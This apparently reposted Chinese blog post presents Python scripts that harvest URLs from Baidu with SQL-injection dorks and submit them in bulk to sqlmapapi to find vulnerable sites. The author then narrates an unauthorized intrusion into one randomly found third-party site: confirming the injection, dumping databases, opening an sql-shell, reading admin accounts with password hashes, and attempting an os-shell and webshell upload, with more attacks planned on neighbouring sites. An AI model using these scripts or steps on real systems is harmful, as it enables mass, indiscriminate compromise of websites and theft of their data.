sql注入批量佛系檢測小工具


       搞滲透測試的人都知道sqlmap,功能很強大(雖說有時並不准確),但每次只能檢測一個url,手動挨個敲命令效率並不高;就算用-m參數,也要等一個任務結束后才能開始下一個,效率高不到哪去;於是官方推出了sqlmapapi.py,開放了api,可批量執行掃描任務,具體原理不再贅述,感興趣的小伙伴可自行google一下;

      一、目標站點的批量爬取:sqlmap跑批的問題解決了,批量的url怎么得到了?寫過爬蟲的小伙伴一定懂的:去爬搜索引擎唄!搜索引擎提供了強大的語法,比如site、inurl等關鍵詞,可以讓用戶自定義目標站點;由於眾所周知的原因,這里以百度為例,分享一下爬取目標站點的python代碼,如下:

#coding: utf-8
import requests,re,threading
import time
from bs4 import BeautifulSoup as bs
from queue import Queue
from argparse import ArgumentParser

arg = ArgumentParser(description='baidu_url_collection')
arg.add_argument('keyword',help='inurl:.asp?id=1')
arg.add_argument('-p', '--page', help='page count', dest='pagecount', type=int)
arg.add_argument('-t', '--thread', help='the thread_count', dest='thread_count', type=int, default=10)
arg.add_argument('-o', '--outfile', help='the file save result', dest='outfile', default='result.txt')
result = arg.parse_args()

headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)'}

class Bd_url(threading.Thread):
    def __init__(self, que):
        threading.Thread.__init__(self)
        self._que = que

    def run(self):
        while not self._que.empty():
            URL = self._que.get()
            try:
                self.bd_url_collect(URL)
            except Exception as e:
                print ('Exception: ',e)
                pass

    def bd_url_collect(self, url):

            r = requests.get(url, headers=headers, timeout=5)

            soup = bs(r.content, 'lxml', from_encoding='utf-8')
            bqs = soup.find_all(name='a', attrs={'data-click':re.compile(r'.'), 'class':None})
            for bq in bqs:

                r = requests.get(bq['href'], headers=headers, timeout=5)
                if r.status_code == 200:
                    print(r.url)

                    with open(result.outfile, 'a') as f:
                        f.write(r.url + '\n')

def main():
    thread = []
    thread_count = result.thread_count
    que = Queue()
    for i in range(0,(result.pagecount)):
        que.put('https://www.baidu.com/s?wd=' + result.keyword + '&pn=' + str(i))

    for i in range(thread_count):
        thread.append(Bd_url(que))

    for i in thread:
        i.start()

    for i in thread:
        i.join()

if __name__ == '__main__':

    start = time.perf_counter()
    main()
    end = time.perf_counter()

    urlcount = len(open(result.outfile,'rU').readlines())

    with open(result.outfile, 'a') as f:
        f.write('--------use time:' + str(end-start) + '-----total url: ' + str(urlcount) + '----------------')


    print("total url: " + str(urlcount))
    print(str(end - start) + "s")
    
    f.close()
    

        代碼的使用很簡單,比如:python crawler.py -p 1000 -t 20 -o url.txt "inurl:php? id=10"  ,這幾個參數的含義分別是:需要爬取的url個數、開啟的線程數、url保存的文件、url里面的關鍵詞;跑完后會在同級目錄下生成url.txt文件,里面有爬蟲爬取的url;

   二、url有了,怎么推送給sqlmapapi了?運行sqlmapapi很簡單一行命令就搞定:重新開個cmd窗口,在sqlmap.py同目錄下運行python sqlmapapi.py -s,后台就在8775端口監聽命令了,如下:

       

   服務已經啟動,最后一步就是發送批量發送url了,這里也已經寫好了python腳本,如下:

# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import requests

def usage():
    print ('+' + '-' * 50 + '+')
    print ('\t   Python sqlmapapi')
    print ('\t   Code BY:zhoumo')
    print ('+' + '-' * 50 + '+')
    if len(sys.argv) != 2:
        print ("example: sqlmapapi_test.py url.txt")
        sys.exit()

def task_new(server):
    url = server + '/task/new'
    req = requests.get(url)
    taskid = req.json()['taskid']
    success = req.json()['success']
    return (success,taskid)

def task_start(server,taskid,data,headers):
    url = server + '/scan/' + taskid + '/start'
    req = requests.post(url,json.dumps(data),headers = headers)
    success = req.json()['success']
    return success

def task_status(server,taskid):
    url = server + '/scan/' + taskid + '/status'
    req = requests.get(url)
    status_check = req.json()['status']
    return status_check

def task_log(server,taskid):
    url = server + '/scan/' + taskid + '/log'
    req = requests.get(url).text
    scan_json = json.loads(req)['log']
    flag1 = 0
    if scan_json:
        print (scan_json[-1]['message'])
        if 'retry' in scan_json[-1]['message']:
            flag1 = 1
        else:
            flag1 = 0
    return flag1

def task_data(server,taskid):
    url = server + '/scan/' + taskid + '/data'
    req = requests.get(url)
    vuln_data = req.json()['data']
    if len(vuln_data):
        vuln = 1
    else:
        vuln = 0
    return vuln

def task_stop(server,taskid):
    url = server + '/scan/' + taskid + '/stop'
    req = requests.get(url)
    success = req.json()['success']
    return success

def task_kill(server,taskid):
    url = server + '/scan/' + taskid + '/kill'
    req = requests.get(url)
    success = req.json()['success']
    return success

def task_delete(server,taskid):
    url = server + '/scan/' + taskid + '/delete'
    requests.get(url)

def get_url(urls):
    newurl = []
    for url in urls:
        if '?' in url  and  url not in newurl:
                newurl.append(url)
    return newurl

if __name__ == "__main__":
    usage()
    targets = [x.rstrip() for x in open(sys.argv[1])]
    targets = get_url(targets)
    server = 'http://127.0.0.1:8775'
    headers = {'Content-Type':'application/json'}
    i= 0
    vuln = []

    for target in targets:
        try:
            data = {"url":target,'batch':True,'randomAgent':True,'tamper':'space2comment','tech':'BT','timeout':15,'level':1}
            i = i + 1
            flag = 0

            (new,taskid) = task_new(server)
            if new:
              print ("scan created")
            if not new:
                print ("create failed")
            start = task_start(server,taskid,data,headers)
            if start:
                print ("--------------->>> start scan target %s" % i)
            if not start:
                print ("scan can not be started")

            while start:
                start_time = time.time()
                status = task_status(server,taskid)
                if status == 'running':
                    print ("scan running:")
                elif status == 'terminated':
                    print ("scan terminated\n")
                    data = task_data(server,taskid)
                    if data:
                        print ("--------------->>> congratulation! %s is vuln\n" % target)
                        f = open('injection.txt','a')
                        f.write(target+'\n')
                        f.close()
                        vuln.append(target)
                    if not data:
                        print ("--------------->>> the target is not vuln\n")
                    task_delete(server,taskid)
                    break
                else:
                    print ("scan get some error")
                    break

                time.sleep(10)
                flag1 = task_log(server,taskid)
                flag = (flag + 1)*flag1

                if (time.time() - start_time > 30) or (flag == 2):  #此處設置檢測超時時間,以及鏈接超時次數
                    print ("there maybe a strong waf or time is over,i will abandon this target.")
                    stop = task_stop(server,taskid)
                    if stop:
                        print ("scan stoped")
                    if not stop:
                        print ("the scan can not be stopped")
                    kill = task_kill(server,taskid)
                    task_delete(server,taskid)
                    if kill:
                        print ("scan killed")
                    if not kill:
                        print ("the scan can not be killed")
                    break
        except:
            pass

    for each in vuln:
        print (each + '\n')

  使用方式很簡單:cmd下直接運行 python  sqlmap_bactch.py url.txt, 這個腳本會把剛才爬蟲爬取的url批量發送到本機8775端口,sqlmapapi接受后會逐個檢測這些url是否存在sql注入;

  

  跑完后,如果url存在sql注入,會在同級目錄下生成injection.txt文件,里面會列舉有sql注入漏洞的站點。本次運氣較好,發現兩個;

       

   三、隨便選個站點人工驗證一下:輸入正常的url后能打開頁面;

       

   在id=10后面加個單引號試試,結果如下:也不知道開發是咋想的,直接在頁面爆了兩個關鍵信息:(1)用的是mysql庫   (2)當前的sql查詢語句,這里hai 可以直接看到庫名;從這里就能反應開發的安全意識;不過還有個小細節:我輸入的單引號在sql語句中被加上了\轉義,說明當初還是考慮到了安全問題........

  

   剩下的就簡單了,sqlmap一把梭,查到了4中注入方式:

      

  繼續查看數據庫名:

   

   還能拿sql-shell:管理員的表能看到賬號,不過密碼是MD5加密過的,不是明文;還有上次登陸的時間和ip也都記錄了;(這里打個岔,既然記錄ip,這里也可能存在sql注入,比如用burp抓包,改x-forward-for字段);

  

     不過拿os-shell就沒那么順利了:嘗試遍歷所有目錄上傳文件都是失敗

       

       通過--priviliges一查,發現果然是權限不夠,只是usage.....

       

       一句話小馬也寫不進去:

       

   在現有的條件下,暫時想不出提示權限、寫小馬的辦法,也不知道怎么查絕對路徑(不知道小馬該放哪),這里暫時放棄;

      通過fofa,發現該站點用了thinkPHP,后續會繼續利用該框架現有的漏洞再嘗試;

  

 

  同一個ip地址,還發現好幾個其他的站點,這些站點有沒有可能存在漏洞,能上傳小馬了?后續都會嘗試

    

 

 

參考:1、https://www.cnblogs.com/BxScope/p/10883422.html  對利用sqlmap獲取os-shell過程的一次抓包分析


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM